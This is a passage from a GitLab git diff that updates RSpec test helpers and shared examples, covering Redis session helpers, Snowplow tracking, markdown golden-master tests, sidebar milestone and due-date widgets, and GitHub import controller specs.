+ expect(page).to have_content(text) + end + + click_button button_text + end + end + end + end + end +end diff --git a/spec/support/helpers/navbar_structure_helper.rb b/spec/support/helpers/navbar_structure_helper.rb index c2ec82155cd..6fa69cbd6ad 100644 --- a/spec/support/helpers/navbar_structure_helper.rb +++ b/spec/support/helpers/navbar_structure_helper.rb @@ -19,6 +19,17 @@ module NavbarStructureHelper hash[:nav_sub_items].insert(index + 1, new_sub_nav_item_name) end + def insert_before_sub_nav_item(after_sub_nav_item_name, within:, new_sub_nav_item_name:) + expect(structure).to include(a_hash_including(nav_item: within)) + hash = structure.find { |h| h[:nav_item] == within if h } + + expect(hash).to have_key(:nav_sub_items) + expect(hash[:nav_sub_items]).to include(after_sub_nav_item_name) + + index = hash[:nav_sub_items].find_index(after_sub_nav_item_name) + hash[:nav_sub_items].insert(index, new_sub_nav_item_name) + end + def insert_package_nav(within) insert_after_nav_item( within, diff --git a/spec/support/helpers/session_helpers.rb b/spec/support/helpers/session_helpers.rb index 4ef099a393e..236585296e5 100644 --- a/spec/support/helpers/session_helpers.rb +++ b/spec/support/helpers/session_helpers.rb @@ -17,10 +17,10 @@ module SessionHelpers end def get_session_keys - Gitlab::Redis::SharedState.with { |redis| redis.scan_each(match: 'session:gitlab:*').to_a } + Gitlab::Redis::Sessions.with { |redis| redis.scan_each(match: 'session:gitlab:*').to_a } end def get_ttl(key) - Gitlab::Redis::SharedState.with { |redis| redis.ttl(key) } + Gitlab::Redis::Sessions.with { |redis| redis.ttl(key) } end end diff --git a/spec/support/helpers/snowplow_helpers.rb b/spec/support/helpers/snowplow_helpers.rb index 553739b5d30..c8b194919ed 100644 --- a/spec/support/helpers/snowplow_helpers.rb +++ b/spec/support/helpers/snowplow_helpers.rb @@ -48,11 +48,15 @@ module SnowplowHelpers # ) def expect_snowplow_event(category:, action:, context: nil, **kwargs) if context - 
kwargs[:context] = [] - context.each do |c| - expect(SnowplowTracker::SelfDescribingJson).to have_received(:new) - .with(c[:schema], c[:data]).at_least(:once) - kwargs[:context] << an_instance_of(SnowplowTracker::SelfDescribingJson) + if context.is_a?(Array) + kwargs[:context] = [] + context.each do |c| + expect(SnowplowTracker::SelfDescribingJson).to have_received(:new) + .with(c[:schema], c[:data]).at_least(:once) + kwargs[:context] << an_instance_of(SnowplowTracker::SelfDescribingJson) + end + else + kwargs[:context] = context end end diff --git a/spec/support/helpers/stub_gitlab_calls.rb b/spec/support/helpers/stub_gitlab_calls.rb index ef3c39c83c2..ae031f58bd4 100644 --- a/spec/support/helpers/stub_gitlab_calls.rb +++ b/spec/support/helpers/stub_gitlab_calls.rb @@ -93,7 +93,7 @@ module StubGitlabCalls def stub_commonmark_sourcepos_disabled render_options = - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) Banzai::Filter::MarkdownEngines::CommonMark::RENDER_OPTIONS_C else Banzai::Filter::MarkdownEngines::CommonMark::RENDER_OPTIONS_RUBY diff --git a/spec/support/helpers/test_env.rb b/spec/support/helpers/test_env.rb index acbc15f7b62..d36bc4e3cb4 100644 --- a/spec/support/helpers/test_env.rb +++ b/spec/support/helpers/test_env.rb @@ -53,7 +53,7 @@ module TestEnv 'wip' => 'b9238ee', 'csv' => '3dd0896', 'v1.1.0' => 'b83d6e3', - 'add-ipython-files' => '2b5ef814', + 'add-ipython-files' => '532c837', 'add-pdf-file' => 'e774ebd', 'squash-large-files' => '54cec52', 'add-pdf-text-binary' => '79faa7b', @@ -594,6 +594,8 @@ module TestEnv # Not a git SHA, so return early return false unless expected_version =~ ::Gitlab::Git::COMMIT_ID + return false unless Dir.exist?(component_folder) + sha, exit_status = Gitlab::Popen.popen(%W(#{Gitlab.config.git.bin_path} rev-parse HEAD), component_folder) return false if exit_status != 0 diff --git a/spec/support/matchers/background_migrations_matchers.rb 
b/spec/support/matchers/background_migrations_matchers.rb index d3833a1e8e8..1057639beec 100644 --- a/spec/support/matchers/background_migrations_matchers.rb +++ b/spec/support/matchers/background_migrations_matchers.rb @@ -9,7 +9,7 @@ RSpec::Matchers.define :be_background_migration_with_arguments do |arguments| end RSpec::Matchers.define :be_scheduled_delayed_migration do |delay, *expected| - define_method :matches? do |migration| + match(notify_expectation_failures: true) do |migration| expect(migration).to be_background_migration_with_arguments(expected) BackgroundMigrationWorker.jobs.any? do |job| @@ -26,7 +26,7 @@ RSpec::Matchers.define :be_scheduled_delayed_migration do |delay, *expected| end RSpec::Matchers.define :be_scheduled_migration do |*expected| - define_method :matches? do |migration| + match(notify_expectation_failures: true) do |migration| expect(migration).to be_background_migration_with_arguments(expected) BackgroundMigrationWorker.jobs.any? do |job| @@ -41,7 +41,7 @@ RSpec::Matchers.define :be_scheduled_migration do |*expected| end RSpec::Matchers.define :be_scheduled_migration_with_multiple_args do |*expected| - define_method :matches? do |migration| + match(notify_expectation_failures: true) do |migration| expect(migration).to be_background_migration_with_arguments(expected) BackgroundMigrationWorker.jobs.any? do |job| diff --git a/spec/support/redis/redis_helpers.rb b/spec/support/redis/redis_helpers.rb index f27d873eb31..90c15dea1f8 100644 --- a/spec/support/redis/redis_helpers.rb +++ b/spec/support/redis/redis_helpers.rb @@ -32,4 +32,11 @@ module RedisHelpers def redis_sessions_cleanup! 
Gitlab::Redis::Sessions.with(&:flushdb) end + + # Usage: reset cached instance config + def redis_clear_raw_config!(instance_class) + instance_class.remove_instance_variable(:@_raw_config) + rescue NameError + # raised if @_raw_config was not set; ignore + end end diff --git a/spec/support/redis/redis_new_instance_shared_examples.rb b/spec/support/redis/redis_new_instance_shared_examples.rb index e9b1e3e4da1..943fe0f11ba 100644 --- a/spec/support/redis/redis_new_instance_shared_examples.rb +++ b/spec/support/redis/redis_new_instance_shared_examples.rb @@ -8,10 +8,16 @@ RSpec.shared_examples "redis_new_instance_shared_examples" do |name, fallback_cl let(:fallback_config_file) { nil } before do + redis_clear_raw_config!(fallback_class) + allow(fallback_class).to receive(:config_file_name).and_return(fallback_config_file) end - include_examples "redis_shared_examples" + after do + redis_clear_raw_config!(fallback_class) + end + + it_behaves_like "redis_shared_examples" describe '.config_file_name' do subject { described_class.config_file_name } diff --git a/spec/support/redis/redis_shared_examples.rb b/spec/support/redis/redis_shared_examples.rb index 72b3a72f9d4..d4c8682ec71 100644 --- a/spec/support/redis/redis_shared_examples.rb +++ b/spec/support/redis/redis_shared_examples.rb @@ -20,11 +20,11 @@ RSpec.shared_examples "redis_shared_examples" do before do allow(described_class).to receive(:config_file_name).and_return(Rails.root.join(config_file_name).to_s) - clear_raw_config + redis_clear_raw_config!(described_class) end after do - clear_raw_config + redis_clear_raw_config!(described_class) end describe '.config_file_name' do @@ -93,18 +93,23 @@ RSpec.shared_examples "redis_shared_examples" do subject { described_class.new(rails_env).store } shared_examples 'redis store' do + let(:redis_store) { ::Redis::Store } + let(:redis_store_to_s) { "Redis Client connected to #{host} against DB #{redis_database}" } + it 'instantiates Redis::Store' do - is_expected.to 
be_a(::Redis::Store) - expect(subject.to_s).to eq("Redis Client connected to #{host} against DB #{redis_database}") + is_expected.to be_a(redis_store) + + expect(subject.to_s).to eq(redis_store_to_s) end context 'with the namespace' do let(:namespace) { 'namespace_name' } + let(:redis_store_to_s) { "Redis Client connected to #{host} against DB #{redis_database} with namespace #{namespace}" } subject { described_class.new(rails_env).store(namespace: namespace) } it "uses specified namespace" do - expect(subject.to_s).to eq("Redis Client connected to #{host} against DB #{redis_database} with namespace #{namespace}") + expect(subject.to_s).to eq(redis_store_to_s) end end end @@ -394,12 +399,6 @@ RSpec.shared_examples "redis_shared_examples" do end end - def clear_raw_config - described_class.remove_instance_variable(:@_raw_config) - rescue NameError - # raised if @_raw_config was not set; ignore - end - def clear_pool described_class.remove_instance_variable(:@pool) rescue NameError diff --git a/spec/support/rspec.rb b/spec/support/rspec.rb index 00b9aac7bf4..b4a25fd121d 100644 --- a/spec/support/rspec.rb +++ b/spec/support/rspec.rb @@ -15,7 +15,10 @@ require 'rubocop' require 'rubocop/rspec/support' RSpec.configure do |config| - config.mock_with :rspec + config.mock_with :rspec do |mocks| + mocks.verify_doubled_constant_names = true + end + config.raise_errors_for_deprecations! 
config.include StubConfiguration diff --git a/spec/support/shared_contexts/features/integrations/project_integrations_shared_context.rb b/spec/support/shared_contexts/features/integrations/project_integrations_shared_context.rb index 07012914a4d..6414a4d1eb3 100644 --- a/spec/support/shared_contexts/features/integrations/project_integrations_shared_context.rb +++ b/spec/support/shared_contexts/features/integrations/project_integrations_shared_context.rb @@ -28,7 +28,7 @@ RSpec.shared_context 'project service activation' do end def click_test_integration - click_link('Test settings') + click_button('Test settings') end def click_test_then_save_integration(expect_test_to_fail: true) diff --git a/spec/support/shared_contexts/markdown_golden_master_shared_examples.rb b/spec/support/shared_contexts/markdown_golden_master_shared_examples.rb new file mode 100644 index 00000000000..d0915bbf158 --- /dev/null +++ b/spec/support/shared_contexts/markdown_golden_master_shared_examples.rb @@ -0,0 +1,127 @@ +# frozen_string_literal: true + +require 'spec_helper' + +# See spec/fixtures/markdown/markdown_golden_master_examples.yml for documentation on how this spec works. 
+RSpec.shared_context 'API::Markdown Golden Master shared context' do |markdown_yml_file_path| + include ApiHelpers + include WikiHelpers + + let_it_be(:user) { create(:user, username: 'gfm_user') } + + let_it_be(:group) { create(:group, :public) } + let_it_be(:project) { create(:project, :public, :repository, group: group) } + + let_it_be(:label) { create(:label, project: project, title: 'bug') } + let_it_be(:milestone) { create(:milestone, project: project, title: '1.1') } + let_it_be(:issue) { create(:issue, project: project) } + let_it_be(:merge_request) { create(:merge_request, source_project: project) } + + let_it_be(:project_wiki) { create(:project_wiki, project: project, user: user) } + + let_it_be(:project_wiki_page) { create(:wiki_page, wiki: project_wiki) } + + before(:all) do + group.add_owner(user) + project.add_maintainer(user) + end + + before do + sign_in(user) + end + + markdown_examples = begin + yaml = File.read(markdown_yml_file_path) + YAML.safe_load(yaml, symbolize_names: true, aliases: true) + end + + it "examples must be unique and alphabetized by name", :unlimited_max_formatted_output_length do + names = markdown_examples.map { |example| example[:name] } + expect(names).to eq(names.sort.uniq) + end + + if focused_markdown_examples_string = ENV['FOCUSED_MARKDOWN_EXAMPLES'] + focused_markdown_examples = focused_markdown_examples_string.split(',').map(&:strip) || [] + markdown_examples.reject! {|markdown_example| !focused_markdown_examples.include?(markdown_example.fetch(:name)) } + end + + markdown_examples.each do |markdown_example| + name = markdown_example.fetch(:name) + api_context = markdown_example[:api_context] + + if api_context && !name.end_with?("_for_#{api_context}") + raise "Name must have suffix of '_for_#{api_context}' to the api_context" + end + + context "for #{name}#{api_context ? 
" (api_context: #{api_context})" : ''}" do + let(:pending_reason) do + pending_value = markdown_example.fetch(:pending, nil) + get_pending_reason(pending_value) + end + + let(:example_markdown) { markdown_example.fetch(:markdown) } + let(:example_html) { markdown_example.fetch(:html) } + let(:substitutions) { markdown_example.fetch(:substitutions, {}) } + + it "verifies conversion of GFM to HTML", :unlimited_max_formatted_output_length do + pending pending_reason if pending_reason + + normalized_example_html = normalize_html(example_html, substitutions) + + api_url = get_url_for_api_context(api_context) + + post api_url, params: { text: example_markdown, gfm: true } + expect(response).to be_successful + response_body = Gitlab::Json.parse(response.body) + # Some requests have the HTML in the `html` key, others in the `body` key. + response_html = response_body['body'] ? response_body.fetch('body') : response_body.fetch('html') + normalized_response_html = normalize_html(response_html, substitutions) + + expect(normalized_response_html).to eq(normalized_example_html) + end + + def get_pending_reason(pending_value) + return false unless pending_value + + return pending_value if pending_value.is_a?(String) + + pending_value[:backend] || false + end + + def normalize_html(html, substitutions) + normalized_html = html.dup + # Note: having the top level `substitutions` data structure be a hash of arrays + # allows us to compose multiple substitutions via YAML anchors (YAML anchors + # pointing to arrays can't be combined) + substitutions.each_value do |substitution_entry| + substitution_entry.each do |substitution| + regex = substitution.fetch(:regex) + replacement = substitution.fetch(:replacement) + normalized_html.gsub!(%r{#{regex}}, replacement) + end + end + + normalized_html + end + end + end + + def supported_api_contexts + %w(project group project_wiki) + end + + def get_url_for_api_context(api_context) + case api_context + when 'project' + 
"/#{project.full_path}/preview_markdown" + when 'group' + "/groups/#{group.full_path}/preview_markdown" + when 'project_wiki' + "/#{project.full_path}/-/wikis/#{project_wiki_page.slug}/preview_markdown" + when nil + api "/markdown" + else + raise "Error: 'context' extension was '#{api_context}'. It must be one of: #{supported_api_contexts.join(',')}" + end + end +end diff --git a/spec/support/shared_contexts/navbar_structure_context.rb b/spec/support/shared_contexts/navbar_structure_context.rb index bcc6abdc308..085f1f13c2c 100644 --- a/spec/support/shared_contexts/navbar_structure_context.rb +++ b/spec/support/shared_contexts/navbar_structure_context.rb @@ -5,7 +5,7 @@ RSpec.shared_context 'project navbar structure' do { nav_item: _('Security & Compliance'), nav_sub_items: [ - (_('Audit Events') if Gitlab.ee?), + (_('Audit events') if Gitlab.ee?), _('Configuration') ] } @@ -94,11 +94,11 @@ RSpec.shared_context 'project navbar structure' do { nav_item: _('Analytics'), nav_sub_items: [ + _('Value stream'), _('CI/CD'), (_('Code review') if Gitlab.ee?), (_('Merge request') if Gitlab.ee?), - _('Repository'), - _('Value stream') + _('Repository') ] }, { @@ -165,7 +165,7 @@ RSpec.shared_context 'group navbar structure' do { nav_item: _('Security & Compliance'), nav_sub_items: [ - _('Audit Events') + _('Audit events') ] } end @@ -190,7 +190,8 @@ RSpec.shared_context 'group navbar structure' do [ _('List'), _('Board'), - _('Milestones') + _('Milestones'), + (_('Iterations') if Gitlab.ee?) 
] end diff --git a/spec/support/shared_contexts/policies/group_policy_shared_context.rb b/spec/support/shared_contexts/policies/group_policy_shared_context.rb index b432aa24bb8..ad6462dc367 100644 --- a/spec/support/shared_contexts/policies/group_policy_shared_context.rb +++ b/spec/support/shared_contexts/policies/group_policy_shared_context.rb @@ -48,6 +48,7 @@ RSpec.shared_context 'GroupPolicy context' do destroy_package create_projects read_cluster create_cluster update_cluster admin_cluster add_cluster + admin_group_runners ] end diff --git a/spec/support/shared_examples/bulk_imports/common/pipelines/wiki_pipeline_examples.rb b/spec/support/shared_examples/bulk_imports/common/pipelines/wiki_pipeline_examples.rb index e8cc666605b..06800f7cded 100644 --- a/spec/support/shared_examples/bulk_imports/common/pipelines/wiki_pipeline_examples.rb +++ b/spec/support/shared_examples/bulk_imports/common/pipelines/wiki_pipeline_examples.rb @@ -9,16 +9,18 @@ RSpec.shared_examples 'wiki pipeline imports a wiki for an entity' do let(:extracted_data) { BulkImports::Pipeline::ExtractedData.new(data: {}) } - context 'successfully imports wiki for an entity' do - subject { described_class.new(context) } + subject { described_class.new(context) } - before do - allow_next_instance_of(BulkImports::Common::Extractors::GraphqlExtractor) do |extractor| - allow(extractor).to receive(:extract).and_return(extracted_data) - end + before do + allow_next_instance_of(BulkImports::Common::Extractors::GraphqlExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return(extracted_data) end + end + context 'when wiki exists' do it 'imports new wiki into destination project' do + expect(subject).to receive(:source_wiki_exists?).and_return(true) + expect_next_instance_of(Gitlab::GitalyClient::RepositoryService) do |repository_service| url = "https://oauth2:token@gitlab.example/#{entity.source_full_path}.wiki.git" expect(repository_service).to receive(:fetch_remote).with(url, 
any_args).and_return 0 @@ -27,5 +29,16 @@ RSpec.shared_examples 'wiki pipeline imports a wiki for an entity' do subject.run end end + + context 'when wiki does not exist' do + it 'does not import wiki' do + expect(subject).to receive(:source_wiki_exists?).and_return(false) + + expect(parent.wiki).not_to receive(:ensure_repository) + expect(parent.wiki.repository).not_to receive(:ensure_repository) + + expect { subject.run }.not_to raise_error + end + end end end diff --git a/spec/support/shared_examples/ci/create_pipeline_service_shared_examples.rb b/spec/support/shared_examples/ci/create_pipeline_service_shared_examples.rb new file mode 100644 index 00000000000..a72ce320e90 --- /dev/null +++ b/spec/support/shared_examples/ci/create_pipeline_service_shared_examples.rb @@ -0,0 +1,27 @@ +# frozen_string_literal: true + +RSpec.shared_examples 'pipelines are created without N+1 SQL queries' do + before do + # warm up + stub_ci_pipeline_yaml_file(config1) + execute_service + end + + it 'avoids N+1 queries', :aggregate_failures, :request_store, :use_sql_query_cache do + control = ActiveRecord::QueryRecorder.new(skip_cached: false) do + stub_ci_pipeline_yaml_file(config1) + + pipeline = execute_service.payload + + expect(pipeline).to be_created_successfully + end + + expect do + stub_ci_pipeline_yaml_file(config2) + + pipeline = execute_service.payload + + expect(pipeline).to be_created_successfully + end.not_to exceed_all_query_limit(control).with_threshold(accepted_n_plus_ones) + end +end diff --git a/spec/support/shared_examples/controllers/githubish_import_controller_shared_examples.rb b/spec/support/shared_examples/controllers/githubish_import_controller_shared_examples.rb index 0ffa32dec9e..46fc2cbdc9b 100644 --- a/spec/support/shared_examples/controllers/githubish_import_controller_shared_examples.rb +++ b/spec/support/shared_examples/controllers/githubish_import_controller_shared_examples.rb @@ -58,11 +58,12 @@ RSpec.shared_examples 'a GitHub-ish import 
controller: GET new' do end RSpec.shared_examples 'a GitHub-ish import controller: GET status' do + let(:repo_fake) { Struct.new(:id, :login, :full_name, :name, :owner, keyword_init: true) } let(:new_import_url) { public_send("new_import_#{provider}_url") } let(:user) { create(:user) } - let(:repo) { OpenStruct.new(login: 'vim', full_name: 'asd/vim', name: 'vim', owner: { login: 'owner' }) } - let(:org) { OpenStruct.new(login: 'company') } - let(:org_repo) { OpenStruct.new(login: 'company', full_name: 'company/repo', name: 'repo', owner: { login: 'owner' }) } + let(:repo) { repo_fake.new(login: 'vim', full_name: 'asd/vim', name: 'vim', owner: { login: 'owner' }) } + let(:org) { double('org', login: 'company') } + let(:org_repo) { repo_fake.new(login: 'company', full_name: 'company/repo', name: 'repo', owner: { login: 'owner' }) } before do assign_session_token(provider) @@ -72,7 +73,7 @@ RSpec.shared_examples 'a GitHub-ish import controller: GET status' do project = create(:project, import_type: provider, namespace: user.namespace, import_status: :finished, import_source: 'example/repo') group = create(:group) group.add_owner(user) - stub_client(repos: [repo, org_repo], orgs: [org], org_repos: [org_repo], each_page: [OpenStruct.new(objects: [repo, org_repo])].to_enum) + stub_client(repos: [repo, org_repo], orgs: [org], org_repos: [org_repo], each_page: [double('client', objects: [repo, org_repo])].to_enum) get :status, format: :json @@ -125,7 +126,7 @@ RSpec.shared_examples 'a GitHub-ish import controller: GET status' do end context 'when filtering' do - let(:repo_2) { OpenStruct.new(login: 'emacs', full_name: 'asd/emacs', name: 'emacs', owner: { login: 'owner' }) } + let(:repo_2) { repo_fake.new(login: 'emacs', full_name: 'asd/emacs', name: 'emacs', owner: { login: 'owner' }) } let(:project) { create(:project, import_type: provider, namespace: user.namespace, import_status: :finished, import_source: 'example/repo') } let(:group) { create(:group) } let(:repos) { 
[repo, repo_2, org_repo] } @@ -133,7 +134,7 @@ RSpec.shared_examples 'a GitHub-ish import controller: GET status' do before do group.add_owner(user) client = stub_client(repos: repos, orgs: [org], org_repos: [org_repo]) - allow(client).to receive(:each_page).and_return([OpenStruct.new(objects: repos)].to_enum) + allow(client).to receive(:each_page).and_return([double('client', objects: repos)].to_enum) # GitHub controller has filtering done using GitHub Search API stub_feature_flags(remove_legacy_github_client: false) end @@ -172,7 +173,7 @@ RSpec.shared_examples 'a GitHub-ish import controller: GET status' do repos = [build(:project, name: 2, path: 'test')] client = stub_client(repos: repos) - allow(client).to receive(:each_page).and_return([OpenStruct.new(objects: repos)].to_enum) + allow(client).to receive(:each_page).and_return([double('client', objects: repos)].to_enum) end it 'does not raise an error' do @@ -189,13 +190,14 @@ end RSpec.shared_examples 'a GitHub-ish import controller: POST create' do let(:user) { create(:user) } let(:provider_username) { user.username } - let(:provider_user) { OpenStruct.new(login: provider_username) } + let(:provider_user) { double('user', login: provider_username) } let(:project) { create(:project, import_type: provider, import_status: :finished, import_source: "#{provider_username}/vim") } let(:provider_repo) do - OpenStruct.new( + double( + 'provider', name: 'vim', full_name: "#{provider_username}/vim", - owner: OpenStruct.new(login: provider_username) + owner: double('owner', login: provider_username) ) end @@ -265,10 +267,9 @@ RSpec.shared_examples 'a GitHub-ish import controller: POST create' do end context "when the repository owner is not the provider user" do - let(:other_username) { "someone_else" } + let(:provider_username) { "someone_else" } before do - provider_repo.owner = OpenStruct.new(login: other_username) assign_session_token(provider) end @@ -277,8 +278,7 @@ RSpec.shared_examples 'a GitHub-ish import 
controller: POST create' do context "when the namespace is owned by the GitLab user" do before do - user.username = other_username - user.save! + user.update!(username: provider_username) end it "takes the existing namespace" do @@ -292,7 +292,7 @@ RSpec.shared_examples 'a GitHub-ish import controller: POST create' do context "when the namespace is not owned by the GitLab user" do it "creates a project using user's namespace" do - create(:user, username: other_username) + create(:user, username: provider_username) expect(Gitlab::LegacyGithubImport::ProjectCreator) .to receive(:new).with(provider_repo, provider_repo.name, user.namespace, user, type: provider, **access_params) diff --git a/spec/support/shared_examples/controllers/repositories/git_http_controller_shared_examples.rb b/spec/support/shared_examples/controllers/repositories/git_http_controller_shared_examples.rb index 00a0fb7e4c5..3a7588a5cc9 100644 --- a/spec/support/shared_examples/controllers/repositories/git_http_controller_shared_examples.rb +++ b/spec/support/shared_examples/controllers/repositories/git_http_controller_shared_examples.rb @@ -50,7 +50,8 @@ RSpec.shared_examples Repositories::GitHttpController do context 'with authorized user' do before do - request.headers.merge! auth_env(user.username, user.password, nil) + password = user.try(:password) || user.try(:token) + request.headers.merge! 
auth_env(user.username, password, nil) end it 'returns 200' do @@ -71,9 +72,10 @@ RSpec.shared_examples Repositories::GitHttpController do it 'adds user info to the logs' do get :info_refs, params: params - expect(log_data).to include('username' => user.username, - 'user_id' => user.id, - 'meta.user' => user.username) + user_log_data = { 'username' => user.username, 'user_id' => user.id } + user_log_data['meta.user'] = user.username if user.is_a?(User) + + expect(log_data).to include(user_log_data) end end end diff --git a/spec/support/shared_examples/controllers/unique_visits_shared_examples.rb b/spec/support/shared_examples/controllers/unique_visits_shared_examples.rb index 30914e61df0..ac7680f7ddb 100644 --- a/spec/support/shared_examples/controllers/unique_visits_shared_examples.rb +++ b/spec/support/shared_examples/controllers/unique_visits_shared_examples.rb @@ -6,15 +6,23 @@ RSpec.shared_examples 'tracking unique visits' do |method| let(:request_params) { {} } it 'tracks unique visit if the format is HTML' do - expect(Gitlab::UsageDataCounters::HLLRedisCounter) - .to receive(:track_event).with(target_id, values: kind_of(String)) + ids = target_id.instance_of?(String) ? [target_id] : target_id + + ids.each do |id| + expect(Gitlab::UsageDataCounters::HLLRedisCounter) + .to receive(:track_event).with(id, values: kind_of(String)) + end get method, params: request_params, format: :html end it 'tracks unique visit if DNT is not enabled' do - expect(Gitlab::UsageDataCounters::HLLRedisCounter) - .to receive(:track_event).with(target_id, values: kind_of(String)) + ids = target_id.instance_of?(String) ? 
[target_id] : target_id + + ids.each do |id| + expect(Gitlab::UsageDataCounters::HLLRedisCounter) + .to receive(:track_event).with(id, values: kind_of(String)) + end stub_do_not_track('0') diff --git a/spec/support/shared_examples/controllers/wiki_actions_shared_examples.rb b/spec/support/shared_examples/controllers/wiki_actions_shared_examples.rb index 30710e43357..1cb52c07069 100644 --- a/spec/support/shared_examples/controllers/wiki_actions_shared_examples.rb +++ b/spec/support/shared_examples/controllers/wiki_actions_shared_examples.rb @@ -299,7 +299,7 @@ RSpec.shared_examples 'wiki controller actions' do expect(response.headers['Content-Disposition']).to match(/^inline/) expect(response.headers[Gitlab::Workhorse::DETECT_HEADER]).to eq('true') expect(response.cache_control[:public]).to be(false) - expect(response.headers['Cache-Control']).to eq('private, no-store') + expect(response.headers['Cache-Control']).to eq('max-age=60, private') end end end diff --git a/spec/support/shared_examples/csp.rb b/spec/support/shared_examples/csp.rb index c4a8c7df898..9143d0f4720 100644 --- a/spec/support/shared_examples/csp.rb +++ b/spec/support/shared_examples/csp.rb @@ -28,7 +28,7 @@ RSpec.shared_examples 'setting CSP' do |rule_name| context 'when feature is enabled' do it "appends to #{rule_name}" do - is_expected.to eql("#{rule_name} #{default_csp_values} #{whitelisted_url}") + is_expected.to eql("#{rule_name} #{default_csp_values} #{allowlisted_url}") end end @@ -46,7 +46,7 @@ RSpec.shared_examples 'setting CSP' do |rule_name| context 'when feature is enabled' do it "uses default-src values in #{rule_name}" do - is_expected.to eql("default-src #{default_csp_values}; #{rule_name} #{default_csp_values} #{whitelisted_url}") + is_expected.to eql("default-src #{default_csp_values}; #{rule_name} #{default_csp_values} #{allowlisted_url}") end end @@ -64,7 +64,7 @@ RSpec.shared_examples 'setting CSP' do |rule_name| context 'when feature is enabled' do it "uses default-src values 
in #{rule_name}" do - is_expected.to eql("font-src #{default_csp_values}; #{rule_name} #{whitelisted_url}") + is_expected.to eql("font-src #{default_csp_values}; #{rule_name} #{allowlisted_url}") end end diff --git a/spec/support/shared_examples/features/page_description_shared_examples.rb b/spec/support/shared_examples/features/page_description_shared_examples.rb index 81653220b4c..e3ea36633d1 100644 --- a/spec/support/shared_examples/features/page_description_shared_examples.rb +++ b/spec/support/shared_examples/features/page_description_shared_examples.rb @@ -7,3 +7,13 @@ RSpec.shared_examples 'page meta description' do |expected_description| end end end + +RSpec.shared_examples 'default brand title page meta description' do + include AppearancesHelper + + it 'renders the page with description, og:description, and twitter:description meta tags with the default brand title', :aggregate_failures do + %w(name='description' property='og:description' property='twitter:description').each do |selector| + expect(page).to have_selector("meta[#{selector}][content='#{default_brand_title}']", visible: false) + end + end +end diff --git a/spec/support/shared_examples/features/sidebar/sidebar_due_date_shared_examples.rb b/spec/support/shared_examples/features/sidebar/sidebar_due_date_shared_examples.rb new file mode 100644 index 00000000000..345dfbce423 --- /dev/null +++ b/spec/support/shared_examples/features/sidebar/sidebar_due_date_shared_examples.rb @@ -0,0 +1,30 @@ +# frozen_string_literal: true + +RSpec.shared_examples 'date sidebar widget' do + context 'editing due date' do + let(:due_date_value) { find('[data-testid="sidebar-due-date"] [data-testid="sidebar-date-value"]') } + + around do |example| + freeze_time { example.run } + end + + it 'displays "None" when there is no due date' do + expect(due_date_value.text).to have_content 'None' + end + + it 'updates due date' do + page.within('[data-testid="sidebar-due-date"]') do + today = Date.today.day + + click_button 
'Edit' + + click_button today.to_s + + wait_for_requests + + expect(page).to have_content(today.to_s(:medium)) + expect(due_date_value.text).to have_content Time.current.strftime('%b %-d, %Y') + end + end + end +end diff --git a/spec/support/shared_examples/features/sidebar/sidebar_milestone_shared_examples.rb b/spec/support/shared_examples/features/sidebar/sidebar_milestone_shared_examples.rb new file mode 100644 index 00000000000..da730240e8e --- /dev/null +++ b/spec/support/shared_examples/features/sidebar/sidebar_milestone_shared_examples.rb @@ -0,0 +1,60 @@ +# frozen_string_literal: true + +RSpec.shared_examples 'milestone sidebar widget' do + context 'editing milestone' do + let_it_be(:milestone_expired) { create(:milestone, project: project, title: 'Foo - expired', due_date: 5.days.ago) } + let_it_be(:milestone_no_duedate) { create(:milestone, project: project, title: 'Foo - No due date') } + let_it_be(:milestone1) { create(:milestone, project: project, title: 'Milestone-1', due_date: 20.days.from_now) } + let_it_be(:milestone2) { create(:milestone, project: project, title: 'Milestone-2', due_date: 15.days.from_now) } + let_it_be(:milestone3) { create(:milestone, project: project, title: 'Milestone-3', due_date: 10.days.from_now) } + + let(:milestone_widget) { find('[data-testid="sidebar-milestones"]') } + + before do + within(milestone_widget) do + click_button 'Edit' + end + + wait_for_all_requests + end + + it 'shows milestones list in the dropdown' do + # 5 milestones + "No milestone" = 6 items + expect(milestone_widget.find('.gl-new-dropdown-contents')).to have_selector('li.gl-new-dropdown-item', count: 6) + end + + it 'shows expired milestone at the bottom of the list and milestone due earliest at the top of the list', :aggregate_failures do + within(milestone_widget, '.gl-new-dropdown-contents') do + expect(page.find('li:last-child')).to have_content milestone_expired.title + + [milestone3, milestone2, milestone1, milestone_no_duedate].each_with_index 
do |m, i| + expect(page.all('li.gl-new-dropdown-item')[i + 1]).to have_content m.title + end + end + end + + it 'adds a milestone' do + within(milestone_widget) do + click_button milestone1.title + + wait_for_requests + + page.within('[data-testid="select-milestone"]') do + expect(page).to have_content(milestone1.title) + end + end + end + + it 'removes a milestone' do + within(milestone_widget) do + click_button "No milestone" + + wait_for_requests + + page.within('[data-testid="select-milestone"]') do + expect(page).not_to have_content(milestone1.title) + end + end + end + end +end diff --git a/spec/support/shared_examples/features/sidebar_shared_examples.rb b/spec/support/shared_examples/features/sidebar_shared_examples.rb index d509d124de0..615f568420e 100644 --- a/spec/support/shared_examples/features/sidebar_shared_examples.rb +++ b/spec/support/shared_examples/features/sidebar_shared_examples.rb @@ -5,6 +5,7 @@ RSpec.shared_examples 'issue boards sidebar' do before do first_card.click + wait_for_requests end it 'shows sidebar when clicking issue' do @@ -41,6 +42,14 @@ RSpec.shared_examples 'issue boards sidebar' do end end + context 'editing issue milestone', :js do + it_behaves_like 'milestone sidebar widget' + end + + context 'editing issue due date', :js do + it_behaves_like 'date sidebar widget' + end + context 'in notifications subscription' do it 'displays notifications toggle', :aggregate_failures do page.within('[data-testid="sidebar-notifications"]') do diff --git a/spec/support/shared_examples/features/snippets_shared_examples.rb b/spec/support/shared_examples/features/snippets_shared_examples.rb index bd1a67f3bb5..c402333107c 100644 --- a/spec/support/shared_examples/features/snippets_shared_examples.rb +++ b/spec/support/shared_examples/features/snippets_shared_examples.rb @@ -20,7 +20,7 @@ RSpec.shared_examples 'paginated snippets' do |remote: false| end RSpec.shared_examples 'tabs with counts' do - let(:tabs) { page.all('.snippet-scope-menu 
